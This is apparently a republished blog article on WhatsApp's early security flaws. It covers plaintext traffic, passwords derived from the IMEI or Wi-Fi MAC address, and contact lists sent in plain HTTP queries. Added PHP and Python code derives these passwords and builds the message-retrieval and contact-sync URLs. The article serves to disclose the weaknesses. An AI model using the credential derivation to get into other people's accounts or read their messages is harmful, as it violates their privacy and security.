WhatsApp Encryption
You may be surprised to learn that until
August 2012, messages sent through the WhatsApp service were not encrypted in
any way: everything was sent in plaintext. That meant that if you were using WhatsApp
on a public Wi-Fi network, everything could be captured by anyone else sniffing the
wireless traffic. The latest WhatsApp client uses encryption, but this new
encryption has been shown to be broken. And even so, the phone number is still sent out in plaintext.
Local storage isn't any better;
see the WhatsApp Database Encryption Project Report.
WhatsApp API & Reverse Engineering
If you know XMPP, the protocol also used
by Facebook chat, GTalk and several others, you can try your hand at WhatsAPI, an
API for the WhatsApp messenger.
WhatsApp uses a customized XMPP server with
proprietary extensions, known internally as FunXMPP.
1. WhatsApp Authentication / Login Mechanism
Like any other XMPP service, WhatsApp logs in with a
Jabber ID (JID) and a password. The password is hashed and stored on the servers at
account creation, and used transparently every time the client connects to the
server.
It is an incredibly poor
implementation. As researchers found out, the username is the user's phone
number, which an attacker would probably already know, and the password is derived
from device identifiers that are not secret at all:
On Android, the password is the MD5 hash of the reversed IMEI number:
<?php
$imei = "112222223333334";                     // example IMEI (15 digits)
$androidWhatsAppPassword = md5(strrev($imei)); // reverse the IMEI and take its MD5 hash
On iOS, the password is generated from the device's WLAN MAC address:
<?php
$wlanMAC = "AA:BB:CC:DD:EE:FF";                      // example WLAN MAC address
$iphoneWhatsAppPassword = md5($wlanMAC . $wlanMAC); // MD5 hash of the MAC address concatenated with itself
Both the IMEI and the MAC address are easily
retrievable from a device if you have physical access to it. The MAC address is even
easier to obtain: you can capture it by sniffing the wireless
network the iOS device is connected to, since it travels unencrypted in every 802.11
frame header regardless of the Wi-Fi encryption in use.
The JID is the concatenation of your
country calling code and mobile number.
The initial login uses Digest Access
Authentication.
You can try this for yourself:
https://r.whatsapp.net/v1/exist.php?cc=$countrycode&in=$phonenumber&udid=$password
$countrycode = the country calling code
$phonenumber = the user's phone number (without the country calling code)
$password = see above: for iPhone use md5($wlanMAC.$wlanMAC), for Android use md5(strrev($imei))
The response is XML and contains the messages waiting for your phone.
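As an added example (not code from the original post or from WhatsAPI), the password derivation for both platforms and the resulting exist.php query rebuilt in Python. Everything here is offline: the endpoint string is copied from the post, the device identifiers are constructed samples, and the exact string the iOS client hashes (upper-case, colon-separated, as in the post's example) is an assumption, since the post only shows one example MAC. That detail matters: any change of case or separator changes the MD5, so a sniffed MAC must be normalised to the same form the client uses.

```python
import hashlib
from urllib.parse import urlencode

# Endpoint as quoted in the post; this script never sends anything to it.
EXIST_URL = "https://r.whatsapp.net/v1/exist.php"


def android_password(imei: str) -> str:
    """Legacy Android password: MD5 of the IMEI digits in reverse order."""
    return hashlib.md5(imei[::-1].encode("ascii")).hexdigest()


def normalize_mac(mac: str) -> str:
    """Canonicalise a MAC address to the "AA:BB:CC:DD:EE:FF" form.

    Assumption: the client hashes the upper-case, colon-separated string shown
    in the post. A MAC read from a sniffer or `ifconfig` may be lower-case or
    dash-separated, and a different string yields a different hash.
    """
    digits = "".join(c for c in mac if c.isalnum())
    if len(digits) != 12 or any(c not in "0123456789abcdefABCDEF" for c in digits):
        raise ValueError(f"not a MAC address: {mac!r}")
    digits = digits.upper()
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def ios_password(wlan_mac: str) -> str:
    """Legacy iOS password: MD5 of the WLAN MAC concatenated with itself."""
    mac = normalize_mac(wlan_mac)
    return hashlib.md5((mac + mac).encode("ascii")).hexdigest()


def legacy_password(platform: str, device_id: str) -> str:
    """Dispatch on platform; device_id is the IMEI (android) or WLAN MAC (ios)."""
    if platform == "android":
        return android_password(device_id)
    if platform == "ios":
        return ios_password(device_id)
    raise ValueError(f"unknown platform: {platform!r}")


def exist_query(country_code: str, number: str, platform: str, device_id: str) -> dict:
    """Query-string parameters of the exist.php check described in the post."""
    return {
        "cc": country_code,                              # country calling code
        "in": number,                                    # number without the country code
        "udid": legacy_password(platform, device_id),    # the derived "password"
    }


def exist_url(country_code: str, number: str, platform: str, device_id: str) -> str:
    """Full GET URL; parameter order follows the post."""
    return EXIST_URL + "?" + urlencode(exist_query(country_code, number, platform, device_id))


if __name__ == "__main__":
    # Constructed sample identifiers, not real devices.
    print(exist_url("1", "5551234567", "android", "112222223333334"))
    print(exist_url("1", "5551234567", "ios", "aa-bb-cc-dd-ee-ff"))
```

The point the code makes concrete: both inputs to `legacy_password` are identifiers, not secrets, and an attacker who knows the phone number (the JID) and has captured the MAC or read the IMEI can compute the same `udid` value the victim's phone would send.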
2. Text Message communication
Messages are sent as TCP
packets in WhatsApp's own format (not the XML stanzas defined in the XMPP RFCs).
Photos, videos and audio files shared
with WhatsApp contacts are uploaded to a server over HTTP before being sent to the
recipient(s); the message body then carries the generated HTTP link together with a
Base64-encoded thumbnail of the media file (where applicable).
WhatsApp Privacy Leak
WhatsApp shares your contacts with the
server; we all know that. But the way it is done is ridiculously insecure. It
basically sends the contact information as a plain HTTP query of phone numbers:
https://sro.whatsapp.net/client/iphone/iq.php?cd=1&cc=$countrycode&me=$yournumber&u[]=$friend1&u[]=$friend2&u[]=$friend3&u[]=$friend4
The server response looks like:
--
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>P</key>
<string>1234567890</string>
<key>T</key>
<integer>10817</integer>
<key>S</key>
<string>Some Status Message</string>
<key>JID</key>
<string>23xxxxxxxxx</string>
<key>NP</key>
<true/>
</dict>
</array>
</plist>
--
Key “P” is the user's phone number, key “T”
seems to be the uptime(?), and key “S” is the user's
status message. I am not sure about “JID” and “NP”
yet; if you have a smart guess, let me know. All
this information is public.
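As an added example (not code from the original post), the contact-sync exchange above rebuilt in Python: one function assembles the iq.php query with the repeated u[] parameters, the other parses the plist reply into records. The response body below is a constructed sample with the same shape as the one quoted in the post; the endpoint string is copied from the post, and the field names (phone, status, and so on) are my own labels for the P, T, S, JID and NP keys, since the post only guesses at some of them. Nothing here contacts the server.

```python
import plistlib
from urllib.parse import urlencode

# Endpoint as quoted in the post; never contacted by this script.
SYNC_URL = "https://sro.whatsapp.net/client/iphone/iq.php"

# Constructed sample reply, shaped like the one in the post (one matched contact).
SAMPLE_RESPONSE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>P</key>
<string>1234567890</string>
<key>T</key>
<integer>10817</integer>
<key>S</key>
<string>Some Status Message</string>
<key>JID</key>
<string>23xxxxxxxxx</string>
<key>NP</key>
<true/>
</dict>
</array>
</plist>
"""


def sync_url(country_code: str, me: str, friends: list) -> str:
    """Rebuild the contact-sync GET: every address-book number is a u[] parameter.

    The list of numbers is the payload; anyone who can see this request
    (or can send it themselves) learns which numbers the sender knows.
    """
    params = [("cd", "1"), ("cc", country_code), ("me", me)]
    params += [("u[]", number) for number in friends]
    # safe="[]" keeps the literal "u[]" key the post shows instead of "u%5B%5D".
    return SYNC_URL + "?" + urlencode(params, safe="[]")


def parse_sync_response(body: bytes) -> list:
    """Parse the plist reply into one record per contact the server matched."""
    entries = plistlib.loads(body)
    if not isinstance(entries, list):
        raise ValueError("expected a plist <array> at the top level")
    records = []
    for entry in entries:
        records.append({
            "phone": entry.get("P"),    # the matched number
            "t": entry.get("T"),        # unknown; the post guesses uptime
            "status": entry.get("S"),   # the contact's status message
            "jid": entry.get("JID"),
            "np": entry.get("NP"),
        })
    return records


def statuses_by_number(records: list) -> dict:
    """What an observer of the reply learns: status text keyed by phone number."""
    return {r["phone"]: r["status"] for r in records if r["phone"] is not None}


if __name__ == "__main__":
    # Constructed sample numbers.
    print(sync_url("1", "5550001111", ["5550002222", "5550003333"]))
    for record in parse_sync_response(SAMPLE_RESPONSE):
        print(record)
    print(statuses_by_number(parse_sync_response(SAMPLE_RESPONSE)))
```

Note that `sync_url` needs nothing but phone numbers to build a valid-looking request: the query carries no per-user secret, which is why the post calls the information public. The same parser works on a multi-entry reply, since the top-level plist array simply grows by one dict per matched contact.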
Source: Geeknizer